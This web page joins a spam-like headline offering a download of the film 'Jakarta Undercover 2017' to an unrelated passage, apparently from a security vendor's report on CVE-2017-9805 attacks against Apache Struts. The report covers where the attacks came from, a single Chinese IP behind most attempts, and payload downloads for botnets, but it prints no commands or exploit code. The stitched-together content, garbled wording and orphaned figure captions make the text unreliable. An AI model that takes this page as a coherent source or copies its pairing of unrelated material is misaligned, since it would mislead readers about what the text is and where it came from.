Download Jakarta Undercover 2017 HD: A Story of Love, Lust, and Betrayal in Jakarta
To date, our systems have successfully blocked thousands of attacks from all over the world with China, as usual in Apache Struts vulnerabilities, identified as the most prominent source of attacks (see Figure 1).Figure 1: Geo-distribution of CVE-2017-9805 attacksIt is interesting to note that a single Chinese IP is responsible for more than 40% of the attack attempts that we registered. According to Shodan, this IP is registered to a large Chinese e-commerce company and runs an open SSH server which may indicate that this is a compromised machine. This machine tried to attack dozens of sites with different automated tools impersonating legitimate browsers such as cURL, wget, and Python-requests indicating the persistency of the attacker(s). Unlike past vulnerabilities, most of the attempted attacks (80%) refer to exploitation attempts and only 20% refer to reconnaissance attempts to track vulnerable servers (see Figure 2). Exploitation attempts involved running operating systems such as shell, wget, or cURL in order to download malicious payload and take over the server to mount further attacks, usually DDoS, as part of a larger botnet.Figure 2: Percentage of payload types of CVE-2017-9805 attack attempts